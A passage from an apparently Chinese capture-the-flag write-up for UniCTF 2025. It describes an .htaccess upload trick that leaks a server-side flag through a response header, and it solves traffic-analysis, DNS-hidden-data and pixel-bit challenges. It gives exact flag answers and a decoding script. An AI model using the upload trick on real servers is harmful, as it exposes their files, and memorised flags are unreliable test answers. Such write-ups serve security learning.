class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>于是这个.htaccess文件在上传上去之后，当Apache加载配置文件时，会读取flag，通过RewriteRule中的[E]将flag赋值给环境变量，然后通过Header设置响应头。</p>
<p>我们先上传.htaccess文件</p>
<p>需要注意的时.htaccess文件只能配置当前目录，设置请求头后我们需要再去访问uplaod目录，然后一开始我想直接访问.htaccess文件看下可以拿到flag吗，结果发现403，可能是在执行配置之前就被403拦截了。</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260215172539383.png" class title="image-20260215172539383">

<p>还是得随便上传一个文件</p>
<p>还有，不知道为什么，我该文件取个名字叫flag也被403拦截了</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260215172953770.png" class title="image-20260215172953770">

<p>但是改成另外一个名字就行了，又是为了防哪种非预期</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260215173035792.png" class title="image-20260215173035792">















<h2 id="2-Misc"><a href="#2-Misc" class="headerlink" title="2.Misc"></a>2.Misc</h2><p>misc无论到哪个比赛里面基本上都是用来出签到题的。</p>
<h3 id="工厂应急流量分析"><a href="#工厂应急流量分析" class="headerlink" title="工厂应急流量分析"></a>工厂应急流量分析</h3><p>这个题目是一个中等题目，但是比赛一开始却是解出人数最多的，会不会是因为可以用某个ai一把梭的原因。</p>
<p>一开始的时候以为是流量分析的题目就没注意到有环境，导致对着一个流量包看了半天也不知道flag在哪里 。</p>
<p>题目类似溯源，需要将流量包中提取到的信息提交到靶机上，有七个信息，全部通过即可获得flag。</p>
<p>题目分别是</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">1.找到 Modbus 打开阀门指令的相关信息。</span><br><span class="line">提交格式：flag&#123;0xtransaction_id_0xfunction_code_0xcoil_address&#125;</span><br><span class="line"></span><br><span class="line">2.找到通过 OPC UA 协议读取的 NodeId。</span><br><span class="line">提交格式：flag&#123;ns=X;s=Path/To/Node&#125;</span><br><span class="line"></span><br><span class="line">3.找出控制站域名 ctrlws.factory.local 的解析 IP。</span><br><span class="line">提交格式：flag&#123;IP地址&#125;</span><br><span class="line"></span><br><span class="line">4.确定SCADA（源：192.168.1.5）到控制站（目的：192.168.1.10）上首个成功发起的时间点(UTC)。</span><br><span class="line">提交格式：flag&#123;YYYY-MM-DDTHH:MM:SSZ&#125;</span><br><span class="line"></span><br><span class="line">5.提取 SCADA 对控制站发起的 HTTP 请求的 Host 与 URI。</span><br><span class="line">提交格式：flag&#123;Host_URI&#125;</span><br><span class="line"></span><br><span class="line">6.攻击者（192.168.1.100）对控制站发起了 ICMP Echo Request（ping）。找出该 ICMP 请求的序列号（Sequence Number）。</span><br><span class="line">提交格式：flag&#123;0x序列号&#125;</span><br><span class="line"></span><br><span class="line">7.SCADA 对控制站发起了 SNMP Get 请求。找出该请求查询的 OID（Object Identifier）。</span><br><span class="line">提交格式：flag&#123;OID&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>其中考到了好多我根本没见过的多种协议，但是flag格式算式一个提示，按照flag格式去找就可以找到。</p>
<p><strong>1.找到 Modbus 打开阀门指令的相关信息。</strong></p>
<p>既然是打开阀门，我们直接找Modbus的第一个流量包，然后在左侧信息栏中找到flag{0xtransaction_id_0xfunction_code_0xcoil_address}</p>
<p>多尝试几次都可以试出flag</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212133242487.png" class title="image-20260212133242487">

<p>把十进制都转成十六进制</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;0x3c4d_0x05_0x0015&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<p><strong>2.找到通过 OPC UA 协议读取的 NodeId。</strong></p>
<p>这个着实看不懂，flag{ns&#x3D;X;s&#x3D;Path&#x2F;To&#x2F;Node}，然后我也不知道怎么找，问了ai结果没想到flag就是第一个TCP包</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212142715251.png" class title="image-20260212142715251">

<p>这些东西不会在计网里面交的吧</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;ns=2;s=Valve/Status&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<p><strong>3.找出控制站域名 ctrlws.factory.local 的解析 IP。</strong></p>
<p>也就是DNS解析<strong>ctrlws.factory.local</strong>指向的ip，我们直接全局搜索搜到</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212143214492.png" class title="image-20260212143214492">

<p>flag</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;192.168.1.10&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<p><strong>4.确定SCADA（源：192.168.1.5）到控制站（目的：192.168.1.10）上首个成功发起的时间点(UTC)。</strong></p>
<p>我们直接看这两个ip第一次交互的包然后找到时间就行了flag{YYYY-MM-DDTHH:MM:SSZ}，然后我们需要结合第二个flag，问了Ds，说那个包才是首个成功发起的时间点</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212144551698.png" class title="image-20260212144551698">

<p>然后对秒进行四舍五入</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;2025-03-15T09:30:01Z&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>





<p><strong>5.提取 SCADA 对控制站发起的 HTTP 请求的 Host 与 URI。</strong></p>
<p>第四个flag说过SCADA源就是(192.168.1.5)，于是我们找192.168.1.5对192.168.1.10发起的首个http请求得到flag{Host_URI}</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212144924196.png" class title="image-20260212144924196">

<p>flag</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;ctrlws.factory.local_/api/status&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<p><strong>6.攻击者（192.168.1.100）对控制站发起了 ICMP Echo Request（ping）。找出该 ICMP 请求的序列号（Sequence Number）。</strong></p>
<p>看出来了，和第一个题目要找到ICMP流量的信息，由于提供了ip，所以很好找，找到ip第一个ICMP的包，然后找到Sequence Number字段</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212150552281.png" class title="image-20260212150552281">

<p>两个都试一下发现是第一个</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;0x0123&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<p><strong>7.SCADA 对控制站发起了 SNMP Get 请求。找出该请求查询的 OID（Object Identifier）。</strong></p>
<p>问Ds，说SNMP Get属于UDP流量，然后给了我一个过滤器</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">udp.port == 161</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>找到对应的ip</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212151350225.png" class title="image-20260212151350225">

<p>flag</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;1.3.6.1.2.1.1.5.0&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>





<h3 id="Silent-Resolver"><a href="#Silent-Resolver" class="headerlink" title="Silent Resolver"></a>Silent Resolver</h3><p>题目提示：看看我藏了什么</p>
<p>流量包一打开，发现全部都是DNS流量，看了一下其他DNS流量分析的题目，发现DNS除了解析域名就藏不了什么东西，于是直接看解析域名。</p>
<p>发现一些特别长的域名</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212160347055.png" class title="image-20260212160347055">

<p>这些数据前面有标号，然后被相同的头和尾包围，于是猜到是拼接，于是将这些数据拼接起来，注意数据是从0开始的MZWGCZ是flag的base32编码</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">kbfqgbauaaaaacaajbsskxfwamzbcoaaaaadmaaaaaeaaaaamz</span><br><span class="line">wgczzoor4hic6nzn2a44nloyy4qk4jb4utekjorf37cc4ob4wd</span><br><span class="line">klrsjqwy4n6pgcxiz5zvjthsrcpxgbgdddqpgzhc4mrofgxaka</span><br><span class="line">cqjmaqefadcqaaaaaiabegkjk4wybteejyaaaaanqaaaaaqaaa</span><br><span class="line">aaaaaaaaaaaaaaeaaeaaaaaamzwgczzoor4hiuclaudaaaaaaa</span><br><span class="line">aqaaiagyaaaac6aaaaaaaa</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>0到5总共六段，拼接起来然后进行base32解码得到</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212161729770.png" class title="image-20260212161729770">

<p>拿到zip文件，解压得到flag</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UniCTF&#123;D0nt_Tr4st_DNS_Qu3r1es_7h3y_M1ght_H1d3_S3cr3ts&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<h3 id="截取的线索"><a href="#截取的线索" class="headerlink" title="截取的线索"></a>截取的线索</h3><p>这个题目比较简单，题目附件是一个文本和一张图片。图片是一个像素带，只有黑白。这一看就是需要我们通过像素点去读取二进制</p>
<p>其实可以看图片的分辨率，这张图片的分辨率是96*1 也就是说有96个黑白像素，然后只有一行，我们直接解密。</p>
<p>这是ds写的脚本</p>
<div class="code-container" code-lang="Python"><div class="codebox"><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> PIL <span class="keyword">import</span> Image</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">extract_bits</span>(<span class="params">img_path, black_is_one=<span class="literal">True</span></span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;从黑白像素图中提取数据&quot;&quot;&quot;</span></span><br><span class="line">    <span class="comment"># 1. 打开并灰度化</span></span><br><span class="line">    img = Image.<span class="built_in">open</span>(img_path).convert(<span class="string">&#x27;L&#x27;</span>)</span><br><span class="line">    pixels = <span class="built_in">list</span>(img.getdata())</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 2. 自动计算阈值（取最小最大值的中点）</span></span><br><span class="line">    threshold = (<span class="built_in">min</span>(pixels) + <span class="built_in">max</span>(pixels)) // <span class="number">2</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 3. 像素→二进制串（True:黑=1, False:黑=0）</span></span><br><span class="line">    bin_str = <span class="string">&#x27;&#x27;</span>.join(</span><br><span class="line">        <span class="string">&#x27;1&#x27;</span> <span class="keyword">if</span> (p &lt;= threshold) == black_is_one <span class="keyword">else</span> <span class="string">&#x27;0&#x27;</span></span><br><span class="line">        <span class="keyword">for</span> p <span class="keyword">in</span> pixels</span><br><span class="line">    )</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 4. 二进制串→字节</span></span><br><span class="line">    padding = (<span class="number">8</span> - <span class="built_in">len</span>(bin_str) % <span class="number">8</span>) % <span class="number">8</span></span><br><span class="line">    bin_str += <span class="string">&#x27;0&#x27;</span> * padding</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">bytes</span>(<span class="built_in">int</span>(bin_str[i:i+<span class="number">8</span>], <span class="number">2</span>) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(bin_str), <span class="number">8</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># 使用示例</span></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(sys.argv) &lt; <span class="number">2</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;用法: python extract.py &lt;图片路径&gt;&quot;</span>)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 尝试两种映射（黑=1/黑=0）</span></span><br><span class="line">    <span class="keyword">for</span> mapping <span class="keyword">in</span> [<span class="literal">True</span>, <span class="literal">False</span>]:</span><br><span class="line">        data = extract_bits(sys.argv[<span class="number">1</span>], black_is_one=mapping)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;\n<span class="subst">&#123;<span class="string">&#x27;黑=1,白=0&#x27;</span> <span class="keyword">if</span> mapping <span class="keyword">else</span> <span class="string">&#x27;白=1,黑=0&#x27;</span>&#125;</span>&quot;</span>)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;前32字节: <span class="subst">&#123;data[:<span class="number">32</span>].<span class="built_in">hex</span>()&#125;</span>&quot;</span>)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;ASCII预览: <span class="subst">&#123;data[:<span class="number">50</span>].decode(<span class="string">&#x27;ascii&#x27;</span>, errors=<span class="string">&#x27;ignore&#x27;</span>)&#125;</span>&quot;</span>)</span><br><span class="line">        </span><br><span class="line">        <span class="comment"># 检查flag</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">b&#x27;flag&#x27;</span> <span class="keyword">in</span> data.lower():</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">f&quot;✅ 发现flag!&quot;</span>)</span><br><span class="line">            <span class="built_in">print</span>(data[data.lower().find(<span class="string">b&#x27;flag&#x27;</span>):data.lower().find(<span class="string">b&#x27;flag&#x27;</span>)+<span class="number">50</span>])</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>当白为1黑为0的时候拿到第二部分flag</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212163324431.png" class title="image-20260212163324431">

<p>另外一个文件是文本文件</p>
